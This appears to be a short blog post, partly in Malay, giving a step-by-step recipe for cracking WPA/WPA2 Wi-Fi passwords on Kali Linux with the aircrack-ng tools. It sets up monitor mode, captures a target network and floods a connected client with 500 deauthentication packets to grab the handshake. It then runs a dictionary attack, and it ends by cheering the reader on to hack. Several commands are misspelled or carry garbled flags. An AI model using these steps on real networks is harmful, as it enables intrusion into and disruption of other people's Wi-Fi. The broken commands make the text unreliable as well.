Ad

Full Step Hacking Wpa Faster

Full Step Hacking Wpa Faster - Kali LINUX

airmon-ng

airmon-ng start wlan0

airodump-ng mon0
Ctrl + C = (Stop Run Terminal)

airdump-ng -w (NAMA WIFI) -c (CH: 1) --bssid (MAC ADDRESS TARGET) mon0

OPEN NEW TERMINAL:

aireplay-ng -e (NAMA Wifi) --deauth 500 -c (STATION MAC) -a (--bssid ) mon0
*(Tunggu Sehinga Keluar WPA handshake -Di Atas Akan Tertulis)
*( Sekiranya Tiada WPA handshake Terkeluar Maybe Tidak Dapat Melakukan Cracking Password)
*( Pastikan #Data/s = 1000 hingga 5000 (Baru Syok Crack)
*Ctrl+ C = (STOP RUN TERMINAL)

aircrack-ng -s -1 -d ( Station MAC) -m (--bssid) -f 1000 -w (password.txt/dictory) Sky-01.cap<--(ivs) -x2
*(sekiranya ingin run crack password sila save Password Di Root Folder)
*(Sky.o1-cap akan DI Save Di bahagian Root Folder Juga secara Auto)

Enjoy For Hack Wpa/WPA2
------------------------------------------
© all rights reserved
made with by templateszoo